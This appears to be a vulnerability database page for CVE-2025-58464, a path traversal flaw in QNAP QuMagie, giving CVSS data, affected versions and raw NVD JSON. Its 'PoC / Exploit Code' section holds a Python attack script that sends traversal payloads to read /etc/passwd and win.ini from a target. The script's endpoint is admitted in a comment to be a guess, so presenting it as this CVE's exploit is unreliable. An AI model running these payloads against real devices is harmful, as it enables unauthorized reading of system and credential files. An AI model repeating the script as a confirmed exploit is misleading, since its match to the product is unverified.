Security Vulnerability Report
中文
CVE-2025-58464 CVSS 7.5 HIGH

CVE-2025-58464

Published: 2025-11-07 16:15:41
Last Modified: 2025-11-14 20:12:22

Description

A relative path traversal vulnerability has been reported to affect QuMagie. If a remote attacker, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following version: QuMagie 2.7.3 and later

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:qnap:qumagie:*:*:*:*:*:*:*:* - VULNERABLE
QuMagie < 2.7.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58464 Path Traversal PoC for QuMagie # Target: QNAP QuMagie Application # Vulnerability: Relative Path Traversal in file handling import requests import sys def test_path_traversal(target_url): """ Test for CVE-2025-58464 Path Traversal vulnerability in QuMagie """ # Common path traversal payloads payloads = [ "../../../../etc/passwd", "..\..\..\..\windows\win.ini", "....//....//....//....//etc/passwd", "../../../../../../etc/passwd%00.png" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE: CVE-2025-58464") print(f"[*] Vulnerability: Path Traversal in QuMagie\n") for payload in payloads: try: # Construct the exploit URL (adjust endpoint based on actual QuMagie API) exploit_url = f"{target_url}/api/file/read?path={payload}" print(f"[*] Testing payload: {payload}") response = requests.get(exploit_url, headers=headers, timeout=10, verify=False) if response.status_code == 200: if 'root:' in response.text or '[extensions]' in response.text: print(f"[!] VULNERABLE! Path traversal successful with payload: {payload}") print(f"[+] Response excerpt: {response.text[:200]}...") return True else: print(f"[-] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] Testing complete. No obvious vulnerability detected.") return False if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] else: target = 'https://qnap-nas.local:8080' test_path_traversal(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58464", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:41.063", "lastModified": "2025-11-14T20:12:22.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability has been reported to affect QuMagie. If a remote attacker, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQuMagie 2.7.3 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qumagie:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.7.0", "versionEndExcluding": "2.7.3", "matchCriteriaId": "DE0FB008-C265-42A1-ABDF-1C5A25AC52D6"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-43", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}